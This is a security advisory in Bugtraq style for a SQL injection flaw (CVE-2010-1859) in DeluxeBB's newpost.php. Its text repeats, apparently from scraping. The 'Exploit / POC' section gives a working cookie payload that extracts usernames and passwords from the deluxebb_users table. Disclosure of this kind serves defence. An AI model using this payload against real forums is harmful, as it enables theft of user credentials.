DeluxeBB 'newpost.php' SQL Injection Vulnerability
BID:39962
Info
DeluxeBB 'newpost.php' SQL Injection Vulnerability
| Bugtraq ID: | 39962 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-1859 |
| Remote: | Yes |
| Local: | No |
| Published: | May 06 2010 12:00AM |
| Updated: | Apr 13 2015 09:02PM |
| Credit: | Stefan Esser |
| Vulnerable: |
DeluxeBB DeluxeBB 1.0 5 DeluxeBB DeluxeBB 1.0 DeluxeBB DeluxeBB 1.3 DeluxeBB DeluxeBB 1.2 DeluxeBB DeluxeBB 1.1 DeluxeBB DeluxeBB 1.09 DeluxeBB DeluxeBB 1.08 DeluxeBB DeluxeBB 1.07 DeluxeBB DeluxeBB 1.06 |
| Not Vulnerable: | |
Discussion
DeluxeBB 'newpost.php' SQL Injection Vulnerability
DeluxeBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DeluxeBB 1.3 and earlier versions are vulnerable.
DeluxeBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DeluxeBB 1.3 and earlier versions are vulnerable.
Exploit / POC
DeluxeBB 'newpost.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example data is available:
membercookie=guest
memberid=xx',(select+concat(username,0x2e,pass)+from+deluxebb_users+limit+1),'none',0,0,0,0,0,'guest','1269081154')+--+x
Attackers can use a browser to exploit this issue.
The following example data is available:
membercookie=guest
memberid=xx',(select+concat(username,0x2e,pass)+from+deluxebb_users+limit+1),'none',0,0,0,0,0,'guest','1269081154')+--+x
Solution / Fix
DeluxeBB 'newpost.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
DeluxeBB 'newpost.php' SQL Injection Vulnerability
References:
References:
- DeluxeBB Homepage (DeluxeBB)
- MOPS-2010-011: DeluxeBB newthread SQL Injection Vulnerability (Stefan Esser)